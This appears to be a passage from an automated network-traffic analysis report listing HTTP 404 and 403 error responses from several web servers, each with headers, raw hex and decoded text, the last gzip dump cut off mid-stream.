6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:52:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:52:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:52:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:52:20 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:53:10 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:53:13 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:53:16 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:53:18 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 03 Dec 2024 13:53:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ONeeRoabhrNsJJhgdNF9R3wL3UE7ON6xRxKxvuOUFjoMUehqYhaGj3iFTc6tENmViJNABpc9iUmHIUfxNi%2BfyPaxS5GEoiZ3gQUFIHJ3f5cp6lRi4bKF5Kf5IICJHDiFBycduC9AVg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec40b783c4143c9-EWRContent-Encoding: gzipalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=102805&min_rtt=102805&rtt_var=51402&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=692&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Vp/JLIIr$T";Ctv6PiEv0yyr0.mx
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 03 Dec 2024 13:53:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o5XxtAP1KZgtxTkAjy8mtLYFaG9eSo0eGmy8AAmKSOXHeb3SBaTfqnvRix%2FOdf%2F%2FD84HlRaNnZujrV0Ob01l2ujWtw7MoynFLFycsSPKgn0Y%2FtT3pzegW9pfZNUnQ9tYssE7Wxy1Zw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec40b88ad50de97-EWRContent-Encoding: gzipalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=102703&min_rtt=102703&rtt_var=51351&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=712&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Vp/JLIIr$T";Ctv6PiEv0yyr0.mx
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 03 Dec 2024 13:53:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8C%2F9sTr3ONQ4CfGEP5rT6wQlo10UdzNLgGgcczkSoWInLFix4%2FssDoQQDb13lKr6oSbecX7GxlZDglKH%2BZIgd4kDMCJQwUr3h3hY5p3I4ZEoAIb%2FACKLcwwHVAEL%2BS%2FQ1PYM22rFAQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec40b99082b19cf-EWRContent-Encoding: gzipalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=103063&min_rtt=103063&rtt_var=51531&sent=3&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7861&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Vp/JLIIr$T";Ctv6PiEv0yyr0.mx
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 03 Dec 2024 13:53:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CJ6HVhxQIol6eeLbu15eF0NUhkrFETNzTO3a%2FwcIQVbYIGqhiwLO7n%2BRu0Hl1JKNDeoMj0SG4HUUAvT00IlCas1HlqMQsYpnFtHBQqMFK4IZUg%2FZO9VO0t1xSnAg3z%2B60n57FtbaTQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec40ba97a144379-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=103071&min_rtt=103071&rtt_var=51535&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=423&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:54:26 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be 4e 5f cc ff 90 59 f3 6f b4 fb db 3c f0 12 1e e7 3a 73 6c e9 e1 3b 15 06 ef 4b 61 0b 15 df 5f f0 77 3f c4 a7 88 86 d8 27 28 92 24 e3 f7 80 61 e9 93 fb 7a fd 58 cd a0 03 0d fd 03 1a ef 7e 12 d3 2f 49 0c 87 4b 94 30 0d fa d9 be a1 3d ff 97 76 ed 67 be 3d e3 61 de 1b 53 8e 28 57 92 f2 98 3a 28 4b 3b 30 3a cd 66 33 3a 35 5a bd fc e7 6c 6c e9 ee 55 92 ef bb 3c ce 16 f1 88 72 82 fb 9a e8 fb ab 1c e7 9b 55 ce 82 99 22 92 63 05 e7 54 b3 08 44 82 a3 88 51 07 2b 2a b8 25 e3 f8 a7 70 13 08 65 54 4c cc 1b a4 d7 b8 c7 f0 17 89 28 4e f6 97 bc ea 6f e9 f3 aa 3a e2 75 79 78 84 b8 96 f9 77 07 60 b1 fc a2 df fc d1 fc d9 fc 6b 70 be b8 10 8f 23 c2 10 54 14 57 81 c5 8e a4 91 3a dc 99 52 ee 8a 69 e3 68 1a 91 50 7c 4e 3f 22 4a 51 ee c7 c6 c4 78 68 da 38 26 ff 22 99 79 50 b4 fd d4 fa d4 8a 1b d3 ac e7 a7 56 ae c6 f8 53 68 2e c9 a7 56 5e fc a9 d5 ea 35 9a 8d ce a7 d6 a0 7d 3a 68 7f 6a 99 fb 26 39 55 50 df 88 b8 0f 8f f8 c4 7f bb 7e 50 98 77 83 df 0f 74 43 b0 b2 b7 48 a4 43 cc 83 87 26 a8 19 6e 91 97 15 fd f3 f6 55 1e 3e b5 a6 11 a8 dd 61 89 9b 0d fa 3c ce 1d 79 09 82 13 13 40 db 08 29 6f 7c 1e ff ec 84 c8 49 bf 31 68 b4 cc b3 b3 07 3b d6 4f de 33 3e 0e 68 6c 78 94 11 03 7e 71 a2 04 f2 09 27 12 46 ba c6 4f ac 9d f7 bc 84 3b 99 14 76 e9 3e df 7b 78 82 a5 21 f6 e3 7d f2 a0 f4 1b ce 2e d9 7b a8 e4 2c 8f a9 c9 c3 38 89 22 21 d5 c7 24 56 f1 01 d9 57 34 04 0b 87 d1 c1 2e 27 53 e3 17 d0 78 af 71 82 59 42 3e f4 76 f7 ce 1e c4 24 8e a1 cd 47 4a 48 e0 a9 11 13 f5 2b 40 bb 2b f6 ff fb 47 1f fe 8f 46 ac 24 5c 8d 7a b3 5d b5 b7 77 06 44 38 41 36 ee ec 6c 31 3e da 85 19 d9 6a a4 e1 00 54 f9 3b
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:54:29 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be 4e 5f cc ff 90 59 f3 6f b4 fb db 3c f0 12 1e e7 3a 73 6c e9 e1 3b 15 06 ef 4b 61 0b 15 df 5f f0 77 3f c4 a7 88 86 d8 27 28 92 24 e3 f7 80 61 e9 93 fb 7a fd 58 cd a0 03 0d fd 03 1a ef 7e 12 d3 2f 49 0c 87 4b 94 30 0d fa d9 be a1 3d ff 97 76 ed 67 be 3d e3 61 de 1b 53 8e 28 57 92 f2 98 3a 28 4b 3b 30 3a cd 66 33 3a 35 5a bd fc e7 6c 6c e9 ee 55 92 ef bb 3c ce 16 f1 88 72 82 fb 9a e8 fb ab 1c e7 9b 55 ce 82 99 22 92 63 05 e7 54 b3 08 44 82 a3 88 